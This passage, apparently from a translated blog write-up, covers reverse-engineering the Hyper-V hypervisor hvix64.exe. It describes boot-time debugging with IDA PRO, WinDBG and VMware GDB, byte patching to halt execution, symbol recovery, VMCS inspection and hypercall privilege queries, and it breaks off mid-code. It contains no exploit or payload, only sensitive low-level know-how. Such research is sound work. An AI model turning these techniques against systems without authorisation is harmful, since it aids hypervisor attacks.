<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Rebase Kdnet extension by: 7000</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">show the boot offset hypervisor and kdstub.dll on address 0xFFFFF800 00000000. This shift will be needed at the moment we switch to IDA PRO debug with winload.exe on hvix64.exe</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Back in the winload.efi </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The function HvlpTransferToHypervisor made the transition to the start feature of hvix64.exe.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="170" src="https://lh4.googleusercontent.com/w-xp8vDKWoIl9RaxhTeJMcljAd-8Vei-jtHaVL0Bd-QcKRNVd7IYL8Xf8zwQjMCy4MeeB1bGvgvIqzgPLuxgLHG8pkCiZCId-bfiOha9Bq3YhS1u2OAc0mcat9nLyC7xZRfhmek22kylheHm" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="264" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The Instruction jmp r8 transfers execution to the code located at the address specified in HvlpBelow1MbPage (0x2000)</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="39" src="https://lh3.googleusercontent.com/HROhJ81-O9Q7it_HWXewcKn6NKM3Ul_UGTxZzBPuLYfGUbVvwMTou5uhOx5xKIJYXtY10TSyhOLamELHrZLGneL8UyWTQm0pzJklcACtVBnyEOpeRpUEKfDi1qGRXqK0ytykkm4CPM3e5DNh" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="360" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In a previous rdx the structure was placed by hvLoaderBlock (offset +18h) address to the start of hvix64.exe</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Later in IDA PRO you have to download hvix64.idb (similar to hvloader. efi), which works as follows:</span></div>
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: -24px; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">insert statement jmp $ (EB FE) at the start of the procedure start in hvix64. exe;</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: -24px; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">completion debugging of winload.efi through the Debugger->the Detach from process; </span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: -24px; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">file download hvix64.efi in IDA PRO;</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: -24px; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">connection to the gdb debugger vmware;</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: -24px; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">restore the changed bytes to the original;</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: -24px; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">performing the operation Edit -> Segment -> Rebase program indicating an Image Base 0xFFFFF800 00000000 + value, which was issued by the debugger in the Rebase Hv by: 6c25000.</span></div>
</li>
</ul>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next quite a number of different operations as to be done in preparation for the execution of vmxon instruction:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="74" src="https://lh3.googleusercontent.com/fDPALKcpWWFVuRmrCFcUUNoIMs2BLrViG4pCrcpQHg24QdTsLPDN0D55yN8uxVBpX66_UOoHOQvXM_tDPhgFecFF0u8c8BRi6_E5zOBc9W7ZCaiQ2RCUW4UlS_SICZ7fJWnEsj83WUFwVWH4" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="318" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Then vmptrld, subsequent filling VMCS with necessary values and in the last instance it will start vmlaunch.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">After vmlaunch gets into HvlpReturnFromHypervisor while debugging via GDB we will see that after the first instruction cpuid, calling VM exit, the transition is made directly to the HOST_RIP.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="231" src="https://lh6.googleusercontent.com/TjvZnMpRmimp-a8V1NJM8OjYGyRN2HURLyWHZsnqJ1lRQvhoeYqD94jUnWciygEdA8sb4rIE9HUhaLglyL00LKCGtxxUrTHMlSgcxFZFsfnV9i7132xvm5XWQYG1eZ5Q_tgk6M6RYXwNOKK7" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="345" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="280" src="https://lh5.googleusercontent.com/3EvTEyU3a4bWAhdEWa_dZOXj12XjuIQ7UJLJ4PazW-_2LGK4MFCwtde6AQ-ZNvOCj5SHE8whw7Yak0CExDQteSIAkQeXiZNeO_GGm6ibCNq7yX0uzqicarh3saFxLwJ2RRF6vVA2-_-XfAuE" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="274" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">After returning from the procedure, HvlpReturnFromHypervisor passes control to the next instruction after HvlpTransferToHypervisor.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="47" src="https://lh5.googleusercontent.com/wrVKd2eS66xqq3jXLKsO0Cdv9Vd3nW9xiDzeXP6CJJLTcNWFNGlhdGYQkGjzSDm07NxCqXGGbhGOoSYxD-PTLn7w1f1urCbVsI9ayzEcyisI6UalzUtgXzUN3tYyYXHdIXnK2Gznw8m08ado" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="493" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> at the end of the function HvlpLaunchHypervisor starts the kernel Windows through OslArchTransferToKernel.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="176" src="https://lh4.googleusercontent.com/Gf5I_9SVVDKVh8jvJ16iMSBNGzMhn8-LozrjlZxlHAR4-inFVwlyeL1S8l0-SKUKglYBo_0yK16St1FiIfBlicZDU7bccdxVBE2q94rHLZAagJDfEDt2xOqeO3bxOzAjh-iF81bVCbR9o658" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="526" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">If the Debugger is connected to the hypervisor, we can observe the following output (for the virtual system Windows Server 2012 checked build with two processors, each consists of two cores).</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">[0] Hypervisor initialized.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">[0] Root Vp created.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">MTRR map: number of ranges = 6 (default=UC)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Base=0x0000000000000000, Size=0x00000000000a0000, Type=WB, Synth=0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Base=0x00000000000a0000, Size=0x0000000000020000, Type=UC, Synth=0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Base=0x00000000000c0000, Size=0x000000000000c000, Type=WP, Synth=0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Base=0x00000000000cc000, Size=0x0000000000024000, Type=UC, Synth=0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Base=0x00000000000f0000, Size=0x0000000000010000, Type=WP, Synth=0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Base=0x0000000000100000, Size=0x00000000bff00000, Type=WB, Synth=0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">----------------------</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">[0] Root Vp started.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">[1] Root Vp created.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">[1] Root Vp started.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">[2] Root Vp created.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">[2] Root Vp started.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">[3] Root Vp created.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">[3] Root Vp started.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">MTRR map: number of ranges = 6 (default=UC)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Base=0x0000000000000000, Size=0x00000000000a0000, Type=WB, Synth=0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Base=0x00000000000a0000, Size=0x0000000000020000, Type=UC, Synth=0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Base=0x00000000000c0000, Size=0x000000000000c000, Type=WP, Synth=0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Base=0x00000000000cc000, Size=0x0000000000024000, Type=UC, Synth=0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Base=0x00000000000f0000, Size=0x0000000000010000, Type=WP, Synth=0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Base=0x0000000000100000, Size=0x00000000bff00000, Type=WB, Synth=0</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">It is worth mentioning that the process of loading a hypervisor in Windows Server 2012 (and higher) differs significantly from Windows Server 2008 R2, where the preparation and launch of the hypervisor directly produced by the hvboot.sys that run after loading the kernel Windows. This activation of the hypervisor instruction vmlaunch performed in the driver hvboot.sys and the next VM exit was processed in the hvix64.exe.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Find symbol information</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">When loading hvix64.exe in IDA PRO we get about three thousand functions with names like sub_FFFFF8000XXXXX because Microsoft, unfortunately, does not provide the symbol information for the hypervisor. Facilitate the research of the hypervisor can first try to identify some of the functions without detailed study.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In the first place it is worth using bindiff (or diaphora) to compare the files hvix64, hvloader and winload where symbol information are provided. Comparison shows that the networking function (e1000), USB, cryptography and some other features are exactly the same as the ones that are present in winload.exe (in Windows Server 2016 debugging </span><span style="background-color: transparent; color: #222222; font-family: "arial"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">functions have been moved to a separate module</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">). This will help set the appointment of 500 functions. The same bindiff allows you to move the names of matching functions from one database to another idb. However, this method should be taken with caution and do not move all fully matched functions. At least the result should be analyzed by Visual comparison graph matching functions (Ctrl + E).</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next, let's define exception/interrupt functions, which are standard for processor architecture x86. A little script is written in python (ParseIDT.py) to parse the IDT, which must be run in IDA PRO, beeing connected through a debugging module of WinDBG to the hypervisor.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In the case of ISR was not found, check the tab List of problems in IDA PRO, since these procedures can not be found in the automatic analysis code that IDA performs.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next, you can define the exit procedure in VM after reading field values VMCS. This can be done after the procedure fill the VMCS at hvix64.exe or use this script display-vmcs.py, which in the context of the hypervisor reads all fields VMCS and prints their values.</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Hypercall</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Microsoft released document Hypervisor Top-Level Functional Specification: Windows Server 2012 R2 (6), describes the architecture of Hyper-V 4.0. Hypervisor Top-Level Functional Specification for Windows Server 2016 </span><span style="background-color: transparent; color: #222222; font-family: "arial"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">has not yet been published</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Each virtual machine, as well as directly with the OS component installed Hyper-V is presented in terms of the partition (partition). Each section has its own identifier that must be unique to the host server.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">For each section are given privileges to create (structure HV_PARTITION_PRIVILEGE_MASK), which determine the ability to perform specific hypercall.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Learn privileges by executing in the root-partition the following code in ring0:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: white; color: black; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvGetPartitionId(&PartID);//PartID – ID section</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: white; color: black; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvGetPartitionProperty(PartID,</span><span style="background-color: white; color: darkslategrey; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HvPartitionPropertyPrivilegeFlags</span><span style="background-color: white; color: black; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">,&HvProp);</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">//</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">the result is returned in HvProp.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HvPartitionPropertyPrivilegeFlags – one of the enumeration values</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_PARTITION_PROPERTY_CODE, which operate functions exported driver winhv.sys.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.2pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_STATUS</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.2pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvGetPartitionProperty(</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.2pt; margin-top: 0pt;">
